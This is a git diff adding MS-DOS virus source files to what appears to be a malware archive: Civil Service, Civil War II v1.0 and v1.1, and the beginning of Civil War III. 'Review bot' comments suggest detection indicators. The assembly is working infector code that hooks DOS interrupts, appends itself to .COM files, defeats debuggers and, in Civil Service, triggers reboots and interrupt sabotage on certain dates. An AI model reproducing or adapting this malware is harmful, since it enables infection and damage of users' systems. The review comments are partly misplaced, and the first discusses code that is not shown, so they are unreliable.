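Review bot: The stack switch back to the interrupted context at the end of LC_SERVICE_INT is not atomic: `MOV SS,DS:[SI].REG_SS` is followed by `MOV SI,CS:INT_TIME_SI`, `MOV DS,CS:INT_TIME_DS` and `MOV BP,CS:INT_TIME_BP` before `MOV SP,CS:INT_TIME_SP`, and the CPU only inhibits interrupts for the single instruction after a MOV SS. If a hardware interrupt is delivered in that window (presumably possible, since nothing here executes CLI), it pushes onto the interrupted program's SS with the C-environment SP still in place and corrupts memory there; moving the SP restore to directly follow the SS load — `MOV SS,DS:[SI].REG_SS` / `MOV SP,CS:INT_TIME_SP` — closes it, and the entry-side pair `MOV SS,CS:C_ENVIRONMENT_SS` / `MOV SP,CS:C_ENVIRONMENT_SP` is already adjacent. The interrupt-time stack is carved 400H bytes below `_TOP` in INT_INIT, so it shares the region the C program's own stack grows into; a comment stating the assumption that the main stack never extends that deep, or a check in INT_INIT, would make the limit visible. Minor: the comment on `MOV CS:INT_IN_PROGRESS,1` reads "clear int in progress flag" but the instruction sets it, and the `XOR AX,AX` after saving RETURN_VALUE is dead because AX is reloaded from REG_SI on the next instruction.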
diff --git a/MSDOS/Virus.MSDOS.Unknown.civil.asm b/MSDOS/Virus.MSDOS.Unknown.civil.asm new file mode 100644 index 00000000..407d7032 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil.asm 
@@ -0,0 +1,569 @@ +; Civil Service Virus by Marvin Giskard +; Turbo Assember version 2 + +Exec equ 4B00h +OpenFile equ 3D02h +ReadFile equ 3Fh +WriteFile equ 40h +CloseFile equ 3Eh +EXESign equ 5A4Dh +SeekTop equ 4200h +SeekEnd equ 4202h +GetAttr equ 4300h +SetAttr equ 4301h +GetDT equ 5700h +SetDT equ 5701h +MinSize equ 4h +MaxSize equ 0FBF0h +GetDate equ 2Bh +FileID equ 2206h +MemID equ 4246h ; 'FB' + +.MODEL SMALL +.CODE +ORG 0100h + +Start: + XOR AX, AX + MOV DS, AX + CMP WORD PTR DS:01ACh, MemID + JNE Instl2 + CMP WORD PTR DS:01AEh, FileID + JE NoInstl2 + +Instl2: + CALL InstallInMem + +NoInstl2: + PUSH CS + PUSH CS + POP DS + POP ES + MOV DX, OFFSET FileName + MOV AX, 4B22h + INT 21h + INT 20h + +FileName: DB 'TEST.COM',0 + +AddCode: + JMP OverData + + ; Addcode's data + +Buf: DB 0, 0 ; Miscellaneous Buf +JumpCode: DB 0E9h, 00h, 00h ; Code to be placed at front of file +FSize: DW 0 ; File size +Attr: DB 0 ; Attr of file being infected +FDateTime: DD 0 ; Time and date of file being infected +Generation: DW 0 ; Generation counter +Infected: DW 0 ; Number of files infected +Old24Handler: DD 0 ; Old INT 24h handler +Acts: DB 0 ; Flag to stop reentry +Path: DD 0 + +OverData: + MOV WORD PTR DS:0100h, 0000h + MOV BYTE PTR DS:0102h, 00h + + ; Check if handler already installed by examining 2 words in vector + ; table entry of INT 6Bh + + XOR AX, AX + MOV DS, AX + CMP WORD PTR DS:01ACh, MemID + JNE Instl + CMP WORD PTR DS:01AEh, FileID + JE AlreadyInstalled + +Instl: + CALL InstallInMem + JMP ALreadyInstalled + +InstallInMem: + MOV WORD PTR DS:01ACh, MemID + MOV WORD PTR DS:01AEh, FileID + + PUSH CS + POP DS + + ; Get INT 21h handler in ES:BX. + + MOV AX, 3521h + INT 21h +DoOldOfs: + MOV SI, OFFSET DoOld+1 + MOV [SI], BX + MOV [SI+2], ES + PUSH ES + PUSH BX + POP DX + POP DS + MOV AX, 256Dh + INT 21h + + ; This label is here so that the infect part will be able to calculate + ; source offset of Int21Handler and then place it in here before writing + ; it to disk. 
The OFFSET AddCode will be replaced by the right number. + +Source: + MOV SI, OFFSET AddCode + + ; Destination e.g. Where program will be placed are now calculated by + ; taking the amount of memory in $0040:$0013. Multiply by 16 to get + ; segment of memory end and then subract amount of blocks needed. + ; This is where routine will be placed. + + MOV AX, 0040h + MOV DS, AX + MOV AX, WORD PTR DS:0013h + MOV CL, 6 + SHL AX, CL + + ; Set dest. segment 2048 pages (32 K) below top of memory. + + SUB AX, 2048 + MOV ES, AX + XOR DI, DI + MOV CX, OFFSET AddCodeEnd - OFFSET AddCode + PUSH CS + POP DS + REP MOVSB + + ; Set INT 21h Handler to point to our routine + + MOV AX, 2521h + PUSH ES + POP DS + MOV DX, OFFSET Int21Handler - OFFSET AddCode + INT 21h + + MOV BYTE PTR DS:[OFFSET Acts-OFFSET AddCode], 0 + + RET + +AlreadyInstalled: + + Call DisTrace + + ; Code to jump back to 0100h + + PUSH CS + PUSH CS + POP DS + POP ES + MOV AX, 0100h + JMP AX + + ; Disable tracing and breakpoint setting for debuggers. 
+ +DisTrace: + MOV AX, 0F000h + MOV DS, AX + MOV DX, 0FFF0h + MOV AX, 2501h + INT 21h + MOV AX, 2503h + INT 21h + RET + +Int21Handler: + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH DI + PUSH SI + PUSH ES + PUSH DS + + ; Install devious act if seed is right + + MOV AH, 2Ah + INT 6Dh + CMP CX, 1991 + JB Act + CMP DL, 22 + JNE Timer + DB 0EAh, 0F0h, 0FFh, 00h, 0F0h + +Timer: + MOV AH, 25h + CMP DL, 29 + JE Inst1 + CMP DL, 1 + JE Inst2 + CMP DL, 10 + JE Inst3 + CMP DL, 16 + JE Inst4 + JMP Act +Inst1: + MOV AL, 13h + JMP SetVec +Inst2: + MOV AL, 16h + JMP SetVec +Inst3: + MOV AL, 0Dh + JMP SetVec +Inst4: + MOV AL, 10h + +SetVec: + PUSH CS + POP DS + MOV DX, OFFSET Int24Handler - OFFSET AddCode + INT 6Dh + +Act: + MOV AX, 0040h + MOV DS, AX + MOV AX, WORD PTR DS:006Eh + + PUSH CS + POP DS + MOV BH, DS:[OFFSET Acts - OFFSET AddCode] + CMP BH, 3 + JE NoAct + + CMP AX, 22 + JE NoAct + + MOV BYTE PTR [SI], 3 + MOV AX, 3509h + INT 21h + PUSH ES + PUSH BX + POP DX + POP DS + MOV AX, 256Ah + INT 21h + PUSH CS + POP DS + MOV DX, OFFSET Int9Handler - OFFSET AddCode + MOV AX, 2509h + INT 21h + + MOV AX, 3517h + INT 21h + PUSH ES + PUSH BX + POP DX + POP DS + MOV AX, 256Ch + INT 21h + PUSH CS + POP DS + MOV DX, OFFSET Int17Handler - OFFSET AddCode + MOV AX, 2517h + INT 21h + +NoAct: + + POP DS + POP ES + POP SI + POP DI + POP DX + POP CX + POP BX + POP AX + + CMP AH, 4Bh + JE Infect +DoOld: + ; This next bytes represent a JMP 0000h:0000h. The 0's will be replaced + ; by the address of the old 21 handler. 
+ DB 0EAh + DD 0 + +DoOldPop: + POP ES + POP DS + POP BP + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + JMP DoOld + +CloseQuit: + + MOV AX, 2524h + MOV SI, OFFSET Old24Handler-OFFSET AddCode + MOV DX, CS:[SI] + MOV DS, CS:[SI+2] + INT 21h + + PUSH CS + POP DS + MOV SI, OFFSET FDateTime-OFFSET AddCode + MOV CX, DS:[SI] + MOV DX, DS:[SI+2] + MOV AX, SetDT + INT 21h + + MOV AH, CloseFile + INT 21h + + MOV AX, SetAttr + MOV CL, DS:[OFFSET Attr - OFFSET AddCode] + XOR CH, CH + MOV SI, OFFSET Path-OFFSET AddCode + MOV DX, DS:[SI] + MOV DS, DS:[SI+2] + + INT 21h + + JMP DoOldPop + +Infect: + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH BP + PUSH DS + PUSH ES + + ; Get file's attr + + MOV AX, GetAttr + INT 21h + JC CloseQuit + MOV CS:[OFFSET Attr-OFFSET AddCode], CL + + MOV SI, OFFSET Path-OFFSET AddCode + MOV CS:[SI], DX + MOV CS:[SI+2], DS + + ; Get/Set INT 24h handler + + MOV AX, 3524h + INT 21h + MOV SI, OFFSET Old24Handler-OFFSET AddCode + MOV CS:[SI], BX + MOV CS:[SI+2], ES + MOV AX, 2524h + PUSH CS + POP DS + MOV DX, OFFSET Int24Handler-OFFSET AddCode + INT 21h + + ; Set new attribute + + MOV SI, OFFSET Path-OFFSET AddCode + MOV DX, CS:[SI] + MOV DS, CS:[SI+2] + + MOV AX, SetAttr + MOV CX, 0020h + INT 21h + JC CloseQuitFoot + + MOV AX, OpenFile + INT 21h + JC CloseQuitFoot + MOV BX, AX + + ; Get file's time and date and store + + MOV AX, GetDT + INT 21h + JC CloseQuitFoot + PUSH CS + POP DS + MOV SI, OFFSET FDateTime-OFFSET AddCode + MOV DS:[SI], CX + MOV DS:[SI+2], DX + + ; Read first two bytes of file + + MOV AH, ReadFile + MOV CX, 2 + MOV DX, OFFSET OverData+4-OFFSET AddCode + INT 21h + JC CloseQuitFoot + + ; Check if fisrt two bytes identify the file as an EXE file + ; If so, then don't infect the file + + CMP DS:[OFFSET OverData+4-OFFSET AddCode], EXESign + JE CloseQuitFoot + + ; Read next byte + + MOV AH, ReadFile + MOV CX, 1 + MOV DX, OFFSET OverData+10-OFFSET AddCode + INT 21h + JC CloseQuitFoot + + ; Get file size + + MOV AX, 
SeekEnd + XOR CX, CX + XOR DX, DX + INT 21h + JC CloseQuitFoot + + ; Save filesize and calculate jump offset + + CMP DX, 0 + JG CloseQuitFoot + CMP AX, MinSize + JB CloseQuitFoot + CMP AX, MaxSize + JA CloseQuitFoot + MOV DS:[OFFSET FSize-OFFSET AddCode], AX + MOV CX, AX + SUB AX, 03h + MOV DS:[OFFSET JumpCode+1-OFFSET AddCode], AX + + ; Calculate and store source + + ADD CX, 0100h + MOV [OFFSET Source+1-OFFSET AddCode], CX + + ADD CX, OFFSET DoOld-OFFSET AddCode + MOV [OFFSET DoOldOfs-OFFSET AddCode+1], CX + + JMP OverFoot1 + +CloseQuitFoot: + JMP CloseQuit + +OverFoot1: + ; Read last 2 bytes to see if it is already infected + + MOV AX, SeekTop + XOR CX, CX + MOV DX, [OFFSET FSize-OFFSET AddCode] + SUB DX, 2 + INT 21h + + MOV AH, ReadFile + MOV CX, 2 + MOV DX, OFFSET Buf-OFFSET AddCode + INT 21h + + CMP [OFFSET Buf-OFFSET AddCode], FileID + JE CloseQuitFoot + + ; Prepare to write new jump + + MOV AX, SeekTop + XOR CX, CX + XOR DX, DX + INT 21h + + ; Write new jump + + MOV AH, WriteFile + MOV CX, 3 + MOV DX, OFFSET JumpCode-OFFSET AddCode + INT 21h + + ; Write addcode + ; Code to restore first three bytes is at start of addcode + ; Int21 handler is also included + ; Generation counter is included in data + ; ID is at the end of addcode + + MOV AX, SeekEnd + XOR CX, CX + XOR DX, DX + INT 21h + + ; Increase generation counter before writing it to the new file + + INC WORD PTR [OFFSET Generation - OFFSET AddCode] + + ; Set files infected to 0, for child hasn't infected anyone. 
+ + MOV SI, OFFSET Infected - OFFSET AddCode + PUSH WORD PTR [SI] + MOV WORD PTR [SI], 0 + + MOV AH, WriteFile + MOV DX, OFFSET AddCode - OFFSET AddCode ; 0000 + MOV CX, OFFSET AddCodeEnd - OFFSET AddCode + INT 21h + + ; Decrease counter again, cause all his children should have the same + ; generation count + + DEC WORD PTR [OFFSET Generation - OFFSET AddCode] + + ; Pop number of files infected and incread + + POP AX + INC AX + MOV WORD PTR [OFFSET Infected - OFFSET AddCode], AX + + JMP CloseQuit + +Int24Handler: + XOR AL, AL + IRET + +Int9Handler: + PUSH AX + PUSH CX + PUSH DS + + MOV AX, 0040h + MOV DS, AX + MOV AH, BYTE PTR DS:006Ch + CMP AH, 18 + JA NoChange + MOV CL, 4 + SHL AH, CL + SHR AH, CL + MOV BYTE PTR DS:0017h, AH + +NoChange: + POP DS + POP CX + POP AX + INT 6Ah + IRET + +Int17Handler: + CMP AH, 00h + JNE DoOld17 + PUSH DS + PUSH AX + PUSH BX + MOV BX, 0040h + MOV DS, BX + MOV BH, BYTE PTR DS:006Ch + SHR BH, 1 + SHR BH, 1 + CMP BH, 22h + JE Ignore17 + POP BX + POP AX + POP DS + +DoOld17: + INT 6Ch + IRET + +Ignore17: + POP BX + POP AX + POP DS + IRET + + DW FileID + +AddCodeEnd: + +END Start + diff --git a/MSDOS/Virus.MSDOS.Unknown.civil210.asm b/MSDOS/Virus.MSDOS.Unknown.civil210.asm new file mode 100644 index 00000000..9dbe6ba9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil210.asm 
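Review bot: None of the four new listings (this one, civil210, civil211 and civil310) carries a header recording the indicators an analyst of this archive needs, even though the code itself fixes them; I would add one to each, starting here. From the visible code: residency is marked by writing `MemID` ('FB') and `FileID` (2206h) into the interrupt-vector table at 0000:01ACh/01AEh (the INT 6Bh slot), the original INT 21h, 09h and 17h handlers are parked in INT 6Dh, 6Ah and 6Ch, `DisTrace` points INT 01h and 03h at F000:FFF0, and an infected .COM starts with a 3-byte E9 jump and ends with the word `FileID`. The date branch after `Int21Handler` jumps far to F000:FFF0 (the reset entry) on day 22 of any month from 1991 on, and on days 29, 1, 10 and 16 it appears to redirect INT 13h/16h/0Dh/10h to the `Int24Handler` stub, which only zeroes AL and returns. A header of the form `; Indicators: word 2206h at EOF of infected .COM; 0000:01AC == 'FB' and 0000:01AE == 2206h when resident; hooks INT 21h/09h/17h, originals parked in INT 6Dh/6Ah/6Ch` would make the sample self-describing; the `FileName`/`MOV AX, 4B22h` stub at `Start` is a dropper harness, not part of the appended `AddCode`.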
@@ -0,0 +1,363 @@ +;**************************************************************************** +; Civil War II * +; * +; Assembled with Tasm 2.5 * +; (c) 1992 Dark Helmet, The Netherlands * +; The author takes no responsibility for any dameged caused by this virus * +; * +;**************************************************************************** +; * +; Civil War... * +; * +; "For all I've seen has change my mind * +; But still the wars go on as the years go by * +; With no love for God or human rights * +; 'Cause all these dreams are swept aside * +; By bloody hands of the hypnotized * +; Who carry the cross of homicide * +; And history bears the scars of our civil war" * +; * +;**************************************************************************** + + .Radix 16 +Civil_War Segment + Model small + Assume cs:Civil_War, ds:Civil_War, es:Civil_War + + org 100h + +len equ offset last - begin +virus_len equ len / 16d + +dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection + ; marker + +begin: Call virus ; make call to + ; push IP on stack + +virus: pop bp ; get IP from stack. + sub bp,109h ; adjust IP. + +restore_host: mov di,0100h ; recover beginning + lea si,ds:[carrier_begin+bp] ; of carrier program. + mov cx,06h + rep movsb + +check_resident: mov ah,0a0h ; check if virus + int 21h ; already installed. 
+ cmp ax,0001h + je end_virus + +adjust_memory: mov ax,cs ; start of Memory + dec ax ; Control Block + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last + ; block + jne abort ; if not last block + ; end + mov ax,ds:[0003] ; decrease memory + sub ax,50 ; by 1kbyte lenght + mov ds:0003,ax + +install_virus: mov bx,ax ; es point to start + mov ax,es ; virus in memory + add ax,bx + mov es,ax + mov cx,len ; cx = lenght virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + lea si,ds:[begin+bp] ; point to start virus + lea di,es:0100 ; point to destination + rep movsb ; copy virus in + ; memory + mov [virus_segment+bp],es ; store start virus + ; in memory + mov ax,cs ; restore es + mov es,ax + +hook_vector: cli ; no interups + mov ax,3517h + int 21h + mov es,[virus_segment+bp] + mov es:[old_17h-6],bx + mov es:[old_17h+2-6h],es + mov dx,offset new_17h - 6h + mov ax,2517h + int 21h + + mov ax,3521h ; revector int 21 + int 21h + mov ds,[virus_segment+bp] + mov ds:[old_21h-6h],bx + mov ds:[old_21h+2-6h],es + mov dx,offset main_virus - 6h + mov ax,2521h + int 21h + sti + +abort: mov ax,cs + mov ds,ax + mov es,ax + xor ax,ax + +end_virus: mov bx,0100h ; jump to begin + jmp bx ; host file + + +;*************************************************************************** + +main_virus: pushf + cmp ah,0a0h ; check virus call + jne new_21h ; no virus call + mov ax,0001h ; ax = id + popf ; return id + iret + +new_21h: push ds ; save registers + push es + push di + push si + push ax + push bx + push cx + push dx + + cmp ah,40h + jne check_05 + cmp bx,0004h + jne check_05 + jmp message + +check_05: cmp ah,05h + jne check_exec + jmp message + +check_exec: cmp ax,04b00h ; exec function? 
+ jne continu + mov cs:[name_seg-6],ds + mov cs:[name_off-6],dx + jmp chk_com + +continu: pop dx ; restore registers + pop cx + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + jmp dword ptr cs:[old_21h-6] + +chk_com: cld ; check extension + mov di,dx ; for COM + push ds + pop es + mov al,'.' ; search extension + repne scasb ; check 'COM" + cmp word ptr es:[di],'OC' ; check 'CO' + jne continu + cmp word ptr es:[di+2],'M' ; check 'M' + jne continu + cmp word ptr es:[di-3],'DN' ; check if + je continu ; COMMAND.COM + + call set_int24h + call set_atribuut + +open_file: mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + mov ax,3D02h ; open file + call do_int21h + jc close_file + push cs + pop ds + mov [handle-6],ax + mov bx,ax + + call get_date + +check_infect: push cs + pop ds + mov bx,[handle-6] ; read first 6 bytes + mov ah,3fh + mov cx,06h + lea dx,[carrier_begin-6] + call do_int21h + mov al, byte ptr [carrier_begin-6]+3 ; check initials + mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H' + cmp ax,[initials-6] + je save_date ; if equal already + ; infect + +get_lenght: mov ax,4200h ; file pointer begin + call move_pointer + mov ax,4202h ; file pointer end + call move_pointer + sub ax,03h ; ax = filelenght + mov [lenght_file-6],ax + + call write_jmp + call write_virus + +save_date: push cs + pop ds + mov bx,[handle-6] + mov dx,[date-6] + mov cx,[time-6] + mov ax,5701h + call do_int21h + +close_file: mov bx,[handle-6] + mov ah,03eh ; close file + call do_int21h + + mov dx,cs:[old_24h-6] ; restore int24h + mov ds,cs:[old_24h+2-6] + mov ax,2524h + call do_int21h + + jmp continu + + + + +new_24h: mov al,3 + iret + + +new_17h: cli + pushf + push ds + push es + push di + push si + push ax + push bx + push cx + push dx + + cmp ah,00h + jne continu_17h + jmp print_message + +continu_17h: pop dx + pop cx + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + sti + jmp dword ptr cs:[old_17h-6] + +print_message: mov ah,09h + lea dx,cs:text-6h + call 
do_int21h + jmp continu_17h + +;--------------------------------------------------------------------------- +; PROCEDURES +;--------------------------------------------------------------------------- + +message: mov ah,09h + lea dx,cs:text-6h + call do_int21h + jmp continu + + + +move_pointer: push cs + pop ds + mov bx,[handle-6] + xor cx,cx + xor dx,dx + call do_int21h + ret + +do_int21h: pushf + call dword ptr cs:[old_21h-6] + ret + +write_jmp: push cs + pop ds + mov ax,4200h + call move_pointer + mov ah,40h + mov cx,01h + lea dx,[jump-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[lenght_file-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[initials-6] + call do_int21h + ret + +write_virus: push cs + pop ds + mov ax,4202h + call move_pointer + mov ah,40 + mov cx,len + mov dx,100 + call do_int21h + ret + +get_date: mov ax,5700h + call do_int21h + push cs + pop ds + mov [date-6],dx + mov [time-6],cx + ret + +set_int24h: mov ax,3524h + call do_int21h + mov cs:[old_24h-6],bx + mov cs:[old_24h+2-6],es + mov dx,offset new_24h-6 + push cs + pop ds + mov ax,2524h + call do_int21h + ret + +set_atribuut: mov ax,4300h ; get atribuut + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + call do_int21h + and cl,0feh ; set atribuut + mov ax,4301h + call do_int21h + ret + +;--------------------------------------------------------------------------- +; DATA +;--------------------------------------------------------------------------- + +old_21h dw 00h,00h +old_17h dw 00h,00h +old_24h dw 00h,00h +carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h +text db 'Civil War II v1.0, (c) 06/03/1992 The Netherlands.','$',00h +jump db 0e9h +name_seg dw ? +name_off dw ? +virus_segment dw ? +lenght_file dw ? +handle dw ? +date dw ? +time dw ? +initials dw 4844h +last db 090h + +Civil_war ends + end dummy + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.civil211.asm b/MSDOS/Virus.MSDOS.Unknown.civil211.asm new file mode 100644 index 00000000..800cfc2b 
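Review bot: The residency check in `check_resident`/`main_virus` uses a private INT 21h function, AH=0A0h answered with AX=0001h, and nothing in the file says so; a comment on `main_virus` such as `; AH=A0h: private are-you-there call, returns AX=1 (v1.0 id)` is the single most useful line for anyone writing a detection for this sample. The other indicators the code establishes are the initials `DH` (4844h) at offset 3 of an infected .COM (written by `write_jmp`, tested in `check_infect`), a last-MCB shrink of 50h paragraphs, and hooks on INT 21h and INT 17h that print the `text` string (AH=09h through the saved INT 21h vector) before forwarding AH=05h, AH=40h on handle 4 and INT 17h AH=00h to the original handlers. Names with `ND` immediately before `.COM` are skipped, which matches COMMAND.COM, and infection is triggered only on AX=4B00h (EXEC), unlike the v1.1 listing in this commit.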
--- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil211.asm 
@@ -0,0 +1,303 @@ +;**************************************************************************** +; Civil War II V1.1 * +; * +; Assembled with Tasm 2.5 * +; (c) 1992 Trident/Dark Helmet, The Netherlands * +; * +;**************************************************************************** +; * +; Civil War... * +; * +; "For all I've seen has change my mind * +; But still the wars go on as the years go by * +; With no love for God or human rights * +; 'Cause all these dreams are swept aside * +; By bloody hands of the hypnotized * +; Who carry the cross of homicide * +; And history bears the scars of our civil war" * +; * +;**************************************************************************** + + .Radix 16 +Civil_War Segment + Model small + Assume cs:Civil_War, ds:Civil_War, es:Civil_War + + org 100h + +len equ offset last - begin +virus_len equ len / 16d + +dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h ; Jump + infection + ; marker + +begin: Call virus ; make call to + ; push IP on stack + +virus: pop bp ; get IP from stack. + sub bp,109h ; adjust IP. + +restore_host: mov di,0100h ; recover beginning + lea si,ds:[carrier_begin+bp] ; of carrier program. + mov cx,06h + rep movsb + +check_resident: mov ah,0a0h ; check if virus + int 21h ; already installed. 
+ cmp ax,0001h + je end_virus + +adjust_memory: mov ax,cs ; start of Memory + dec ax ; Control Block + mov ds,ax + cmp byte ptr ds:[0000],5a ; check if last + ; block + jne abort ; if not last block + ; end + mov ax,ds:[0003] ; decrease memory + sub ax,40 ; by 1kbyte lenght + mov ds:[0003],ax + sub word ptr ds:[0012],40h + +install_virus: mov bx,ax ; es point to start + mov ax,es ; virus in memory + add ax,bx + mov es,ax + mov cx,len ; cx = lenght virus + mov ax,ds ; restore ds + inc ax + mov ds,ax + lea si,ds:[begin+bp] ; point to start virus + lea di,es:0100 ; point to destination + rep movsb ; copy virus in + ; memory + mov [virus_segment+bp],es ; store start virus + ; in memory + mov ax,cs ; restore es + mov es,ax + +hook_vector: cli ; no interups + mov ax,3521h ; revector int 21 + int 21h + mov ds,[virus_segment+bp] + mov old_21h-6h,bx + mov old_21h+2-6h,es + + mov dx,offset main_virus - 6h + mov ax,2521h + int 21h + sti + +abort: mov ax,cs + mov ds,ax + mov es,ax + +end_virus: mov bx,0100h ; jump to begin + jmp bx ; host file + + +;***************************************************************************** + +main_virus: pushf + cmp ah,0a0h ; check virus call + jne new_21h ; no virus call + mov ax,0001h ; ax = id + popf ; return id + iret + +new_21h: push ds ; save registers + push es + push di + push si + push ax + push bx + push cx + push dx + +check_open: cmp ah,3dh + je chk_com + +check_exec: cmp ax,04b00h ; exec function? + je chk_com + +continu: pop dx ; restore registers + pop cx + pop bx + pop ax + pop si + pop di + pop es + pop ds + popf + jmp dword ptr cs:[old_21h-6] + +chk_com: mov cs:[name_seg-6],ds + mov cs:[name_off-6],dx + cld ; check extension + mov di,dx ; for COM + push ds + pop es + mov al,'.' 
; search extension + repne scasb ; check for 'COM" + cmp word ptr es:[di],'OC' ; check 'CO' + jne continu + cmp word ptr es:[di+2],'M' ; check 'M' + jne continu + + call set_int24h + call set_atribuut + +open_file: mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + mov ax,3D02h ; open file + call do_int21h + jc close_file + push cs + pop ds + mov [handle-6],ax + mov bx,ax + + call get_date + +check_infect: push cs + pop ds + mov bx,[handle-6] ; read first 6 bytes + mov ah,3fh + mov cx,06h + lea dx,[carrier_begin-6] + call do_int21h + mov al, byte ptr [carrier_begin-6]+3 ; check initials + mov ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H' + cmp ax,[initials-6] + je save_date ; if equal already + ; infect + +get_lenght: mov ax,4200h ; file pointer begin + call move_pointer + mov ax,4202h ; file pointer end + call move_pointer + sub ax,03h ; ax = filelenght + mov [lenght_file-6],ax + + call write_jmp + call write_virus + +save_date: push cs + pop ds + mov bx,[handle-6] + mov dx,[date-6] + mov cx,[time-6] + mov ax,5701h + call do_int21h + +close_file: mov bx,[handle-6] + mov ah,03eh ; close file + call do_int21h + + mov dx,cs:[old_24h-6] ; restore int24h + mov ds,cs:[old_24h+2-6] + mov ax,2524h + call do_int21h + + jmp continu + + + + +new_24h: mov al,3 + iret + +;--------------------------------------------------------------------------- +; PROCEDURES +;--------------------------------------------------------------------------- + +move_pointer: push cs + pop ds + mov bx,[handle-6] + xor cx,cx + xor dx,dx + call do_int21h + ret + +do_int21h: pushf + call dword ptr cs:[old_21h-6] + ret + +write_jmp: push cs + pop ds + mov ax,4200h + call move_pointer + mov ah,40h + mov cx,01h + lea dx,[jump-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[lenght_file-6] + call do_int21h + mov ah,40h + mov cx,02h + lea dx,[initials-6] + call do_int21h + ret + +write_virus: push cs + pop ds + mov ax,4202h + call move_pointer + mov ah,40 + mov cx,len + mov dx,100 + call do_int21h + 
ret + +get_date: mov ax,5700h + call do_int21h + push cs + pop ds + mov [date-6],dx + mov [time-6],cx + ret + +set_int24h: mov ax,3524h + call do_int21h + mov cs:[old_24h-6],bx + mov cs:[old_24h+2-6],es + mov dx,offset new_24h-6 + push cs + pop ds + mov ax,2524h + call do_int21h + ret + +set_atribuut: mov ax,4300h ; get atribuut + mov ds,cs:[name_seg-6] + mov dx,cs:[name_off-6] + call do_int21h + and cl,0feh ; set atribuut + mov ax,4301h + call do_int21h + ret + +;--------------------------------------------------------------------------- +; DATA +;--------------------------------------------------------------------------- + +old_21h dw 00h,00h +old_24h dw 00h,00h +carrier_begin db 090h, 0cdh, 020h, 044h, 048h, 00h +text db 'Civil War II v1.1, (c) 06/03/1992 Trident/Dark Helmet, The Netherlands',00h +jump db 0e9h +name_seg dw ? +name_off dw ? +virus_segment dw ? +lenght_file dw ? +handle dw ? +date dw ? +time dw ? +initials dw 4844h +last db 090h + +Civil_war ends + end dummy + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.civil310.asm b/MSDOS/Virus.MSDOS.Unknown.civil310.asm new file mode 100644 index 00000000..8cdaa190 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.civil310.asm 
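Review bot: The header says only `V1.1` and gives no changelog, so what differs from the v1.0 listing in the same commit has to be diffed by hand; a `; Changes from v1.0:` block should record it. From the visible code: the INT 17h hook and the printer-message payload are gone (`text` survives only as data), INT 21h AH=3Dh (open) now also triggers infection besides AX=4B00h, the COMMAND.COM exclusion (the `'DN'` compare) was dropped, and the MCB is shrunk by 40h paragraphs with what appears to be the PSP top-of-memory word at ds:[0012] adjusted to match. The residency probe (INT 21h AH=0A0h returning AX=0001h) and the `DH` marker at offset 3 are unchanged, so detection logic written for v1.0 still applies here.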
@@ -0,0 +1,476 @@ +;**************************************************************************** +; Civil War III, * +; * +; Assembled with Tasm 2.5 * +; (c) 1992 Dark Helmet / TridenT, The Netherlands * +; The author takes no responsibility for any damaged caused by this virus * +; * +;**************************************************************************** +; * +; Civil War... * +; * +; "For all I've seen has change my mind * +; But still the wars go on as the years go by * +; With no love for God or human rights * +; 'Cause all these dreams are swept aside * +; By bloody hands of the hypnotized * +; Who carry the cross of homicide * +; And history bears the scars of our civil war" * +; * +;**************************************************************************** + + + .Radix 16 +Civ_War Segment + Model small + Assume cs:Civ_War, ds:Civ_War, es:Civ_War + + org 100h + +lenght equ offset last - start +virus_lenght equ lenght /16d + +;****************************************************************************** +; +; A dummy file created only for the virus dropper +; +;****************************************************************************** + +dummy: db 0e9h, 00h, 00h ; Jump + infection + ; marker + +;****************************************************************************** +; +; Here starts the virus code +; +;****************************************************************************** + +start: call start_2 ; Make call to + ; push IP on stack. +start_2: pop bp ; Get IP from stack. + sub bp, offset start_2 + +check_host: cmp cs:[host_file+bp],0Ch ; Check if the host + ; file is a COM file. + jne exe_start ; Host file is an + ; EXE file. + +com_start: mov di,0100h ; Restore beginning + lea si,cs:[host_begin+bp] ; of the host file + mov cx,03h ; (first 6 bytes). + rep movsb + + push cs ; New CS on stack. + mov ax,0100h ; New IP on stack. 
+ push ax + jmp chk_install + +exe_start: mov ax,cs:[old_cs+bp] ; Calculate new + mov bx,ax ; CS + mov ax,ds + add ax,bx + add ax,10h + push ax ; New CS on stack. + mov ax,cs:[old_ip+bp] + push ax ; New IP on stack. + + +chk_install: + push ds + push es + + mov ah,0a0h ; check if virus already + int 21h ; resident + cmp ax,0003h ; check for virus_id + je abort + +adjust_memory: push ds ; lower DS with 1 + pop ax ; paragraf + dec ax + push ax + pop ds + cmp byte ptr ds:[0000],5a ; Check if last MCB. + jne abort ; If not last MCB end. + + mov ax,ds:[0003] ; decrease memory size + sub ax,50h ; by about 1k + mov ds:[0003],ax + + sub word ptr ds:[0012],50h + +install_virus: mov bx,ax ; virus destination. + mov ax,es + add ax,bx + mov es,ax + mov cs:[v_segment+bp],es ; save virus segment + ; for hooking interrupt + push cs ; DS points to segment + pop ds ; with virus + + mov cx,lenght ; Virus lenght. + lea si,[start+bp] ; Start of virus. + lea di,es:0103h ; Where to copy virus + ; to. + rep movsb ; move virus to + ; new memory location. 
